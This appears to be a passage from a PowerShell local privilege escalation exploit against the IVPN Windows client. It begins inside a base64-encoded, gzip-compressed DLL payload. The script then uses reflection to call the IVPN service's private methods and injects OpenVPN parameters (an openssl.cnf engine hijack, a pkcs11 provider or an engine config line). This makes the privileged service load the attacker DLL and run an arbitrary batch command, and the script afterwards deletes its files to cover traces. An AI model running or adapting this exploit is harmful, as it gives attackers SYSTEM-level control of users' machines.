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"
	$DeflatedStream = New-Object System.IO.Compression.GZipStream([System.IO.MemoryStream][System.Convert]::FromBase64String($EncodedCompressedFile), [System.IO.Compression.CompressionMode]::Decompress)
	$dll = New-Object byte[] 13312
	$DeflatedStream.Read($dll, 0, $dll.Length) \| Out-Null
	$DeflatedStream.Close() \| Out-Null

	# reflection stuff
	$mConnectToService = [IVPN.IVPNClientProxy].GetMethod("ConnectToService", [Reflection.BindingFlags]"NonPublic, Instance")
	$mSendRequest = [IVPN.IVPNClientProxy].GetMethod("SendRequest", [Reflection.BindingFlags]"NonPublic, Instance")
	$fStreamReader = [IVPN.IVPNClientProxy].GetField("__StreamReader", "NonPublic, Instance")
	$fStreamWriter = [IVPN.IVPNClientProxy].GetField("__StreamWriter", "NonPublic, Instance")
	$fVersion = [IVPN.IVPNHelloRequest].GetField("Version", "NonPublic, Instance")
	$fKey = [IVPN.IVPNSetPreferenceRequest].GetField("Key", "NonPublic, Instance")
	$fValue = [IVPN.IVPNSetPreferenceRequest].GetField("Value", "NonPublic, Instance")
	$fEntryVpnServer = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("EntryVpnServer", "NonPublic, Instance")
	$fUsername = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Username", "NonPublic, Instance")
	$fPassword = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Password", "NonPublic, Instance")
	$fPort = [IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters].GetField("Port", "NonPublic, Instance")
	$fVpnType = [IVPN.IVPNConnectRequest].GetField("VpnType", "NonPublic, Instance")
	$fOpenVpnParameters = [IVPN.IVPNConnectRequest].GetField("OpenVpnParameters", "NonPublic, Instance")
	$fCurrentDns = [IVPN.IVPNConnectRequest].GetField("CurrentDns", "NonPublic, Instance")

	# connect to service
	$client = New-Object IVPN.IVPNClientProxy
	$mConnectToService.Invoke($client, $null)
	$client.ServiceConnected = $true

	# send hello request
	$hello = New-Object IVPN.IVPNHelloRequest
	$fVersion.SetValue($hello, "2.11.2.0")
	$mSendRequest.Invoke($client, $hello)
	Start-Sleep 1

	If($ExploitMethod -eq [ExploitMethod]::ConfigHijack) {
	$targetfolder = "$env:SystemDrive\etc"
	New-Item -Type directory -Path "$targetfolder\ssl" \| Out-Null
	Set-Content "$targetfolder\ssl\payload.bat" -Encoding ASCII $Command
	Set-Content "$targetfolder\ssl\lpe.dll" -Encoding Byte $dll
	Set-Content "$targetfolder\ssl\openssl.cnf" -Encoding ASCII "openssl_conf = init
	[init]
	engines = engines
	[engines]
	lpe = lpe
	[lpe]
	engine_id = lpe
	dynamic_path = C:\\etc\\ssl\\lpe
	default_algorithms = ALL
	init = 1"
	} Else {
	$targetfolder = "$env:TEMP\" + [System.Guid]::NewGuid()
	$dllname = [System.Guid]::NewGuid().ToString()
	New-Item -Type directory -Path "$targetfolder" \| Out-Null
	Set-Content "$targetfolder\payload.bat" -Encoding ASCII $Command
	Set-Content "$targetfolder\$dllname.dll" -Encoding Byte $dll

	If($ExploitMethod -eq [ExploitMethod]::Pkcs11) {
	$extraparam = "pkcs11-providers $("$targetfolder\$dllname.dll".Replace("\", "\\"))`npkcs11-id $dllname"
	} Else {
	Set-Content "$targetfolder\openvpn.cfg" -Encoding ASCII "engine $("$targetfolder\$dllname".Replace("\", "\\"))"
	$extraparam = "config $("$targetfolder\openvpn.cfg".Replace("\", "\\"))"
	}

	# set OpenVPN extra config parameters
	$setting = New-Object IVPN.IVPNSetPreferenceRequest
	$fKey.SetValue($setting, "open_vpn_extra_parameters")
	$fValue.SetValue($setting, $extraparam)
	$mSendRequest.Invoke($client, $setting)
	Start-Sleep 1
	}

	# launch OpenVPN
	$server = New-Object IVPN.VpnProtocols.OpenVPN.OpenVPNVpnServer -Property @{IpAddresses = @("127.0.0.1"); GatewayId = "GatewayId"; CountryCode = "US"; Country = "United States"; City = "New York"}
	$conparams = New-Object IVPN.VpnProtocols.OpenVPN.OpenVPNConnectionParameters
	$fEntryVpnServer.SetValue($conparams, $server)
	$fUsername.SetValue($conparams, "Username")
	$fPassword.SetValue($conparams, "Password")
	$fPort.SetValue($conparams, $(New-Object IVPN.VpnProtocols.DestinationPort(1337, 1)))
	$conreq = New-Object IVPN.IVPNConnectRequest
	$fVpnType.SetValue($conreq, [IVPN.VpnProtocols.VpnType]::OpenVPN)
	$fOpenVpnParameters.SetValue($conreq, $conparams)
	$fCurrentDns.SetValue($conreq, "8.8.8.8")
	$mSendRequest.Invoke($client, $conreq)
	Start-Sleep 3

	# disconnect vpn
	$mSendRequest.Invoke($client, $(New-Object IVPN.IVPNDisconnectRequest))
	Start-Sleep 1

	# disconnect from service
	$fStreamReader.GetValue($client).Close()
	$fStreamWriter.GetValue($client).Close()
	$client = $null
	# clean up
	Remove-Item $([IVPN.Platform]::SettingsDirectory) -Force -Recurse
	Remove-Item $targetfolder -Force -Recurse
	}